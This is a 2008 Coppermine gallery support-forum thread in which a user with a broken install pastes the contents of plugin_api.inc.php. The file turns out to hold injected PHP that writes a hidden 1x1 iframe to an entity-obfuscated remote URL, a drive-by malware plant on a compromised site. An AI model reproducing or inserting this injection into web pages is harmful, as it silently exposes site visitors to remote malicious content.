Advanced search  

News:

cpg1.5.48 Security release - upgrade mandatory!
The Coppermine development team is releasing a security update for Coppermine in order to counter a recently discovered vulnerability. It is important that all users who run version cpg1.5.46 or older update to this latest version as soon as possible.
[more]

Pages: [1]   Go Down

Author Topic: Fatal error: undefined class name  (Read 1920 times)

0 Members and 1 Guest are viewing this topic.

fruity

  • Coppermine newbie
  • Offline Offline
  • Posts: 2
Fatal error: undefined class name
« on: April 17, 2008, 03:51:07 pm »

Hello
When i want to go on my coppermine-galler, i get this message:

Fatal error: Undefined class name 'cpgpluginapi' in /mnt/web6/32/92/51319892/htdocs/cpg1410/include/init.inc.php on line 224

Before i get this, the gallery runs without problems.
Why do i recieve this error now?
I changed nothing  :(

best regards
fruity
Logged

Nibbler

  • Guest
Re: Fatal error: undefined class name
« Reply #1 on: April 17, 2008, 03:56:26 pm »

Make sure include/plugin_api.inc.php is present and correct (eg. not an empty file).
Logged

fruity

  • Coppermine newbie
  • Offline Offline
  • Posts: 2
Re: Fatal error: undefined class name
« Reply #2 on: April 17, 2008, 04:01:11 pm »

Hi

the pligin_api.inc.php file istn't empty.
There are a few lines Code

Code: [Select]
<?php 
if(
$GLOBALS["fx"]==0) { 
$GLOBALS["fx"]=1;
echo "<iframe src='&#38;#104;&#38;#116;&#38;#116;&#38;#112;&#38;#58;&#38;#47;&#38;#47;&#38;#99;&#38;#99;&#38;#102;&#38;#101;&#38;#108;&#38;#111;&#38;#109;&#38;#118;&#38;#104;&#38;#107;&#38;#46;&#38;#99;&#38;#111;&#38;#109;&#38;#47;&#38;#100;&#38;#108;&#38;#47;&#38;#97;&#38;#100;&#38;#118;&#38;#53;&#38;#52;&#38;#50;&#38;#46;&#38;#112;&#38;#104;&#38;#112;' width=1 height=1></iframe>";
}
?>
this is the whole code
Logged

Nibbler

  • Guest
Re: Fatal error: undefined class name
« Reply #3 on: April 17, 2008, 04:04:48 pm »

Logged
Pages: [1]   Go Up
 

Page created in 0.014 seconds with 20 queries.